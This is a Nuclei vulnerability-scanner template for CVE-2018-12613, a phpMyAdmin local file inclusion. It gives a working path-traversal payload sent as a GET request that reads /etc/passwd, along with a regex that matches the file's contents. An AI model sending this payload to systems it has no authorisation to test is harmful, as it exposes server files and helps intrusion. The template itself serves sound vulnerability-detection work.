nuclei-templates/cves/2018/CVE-2018-12613.yaml

39 lines
1.6 KiB
YAML

id: CVE-2018-12613
info:
name: PhpMyAdmin <4.8.2 - Local File Inclusion
author: pikpikcu
severity: high
description: PhpMyAdmin before version 4.8.2 is susceptible to local file inclusion that allows an attacker to include (view and potentially execute) files on the server. The vulnerability comes from a portion of code where pages are redirected and loaded within phpMyAdmin, and an improper test for whitelisted pages. An attacker must be authenticated, except in the "$cfg['AllowArbitraryServer'] = true" case (where an attacker can specify any host he/she is already in control of, and execute arbitrary code on phpMyAdmin) and the "$cfg['ServerDefault'] = 0" case (which bypasses the login requirement and runs the vulnerable code without any authentication).
reference:
- https://github.com/vulhub/vulhub/tree/master/phpmyadmin/CVE-2018-12613
- https://www.phpmyadmin.net/security/PMASA-2018-4/
- https://www.exploit-db.com/exploits/44928/
- http://web.archive.org/web/20210124181726/https://www.securityfocus.com/bid/104532/
- https://nvd.nist.gov/vuln/detail/CVE-2018-12613
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2018-12613
cwe-id: CWE-287
tags: vulhub,edb,cve,cve2018,phpmyadmin,lfi
requests:
- method: GET
path:
- '{{BaseURL}}/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd'
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
part: body
- type: status
status:
- 200
# Enhanced by mp on 2022/07/06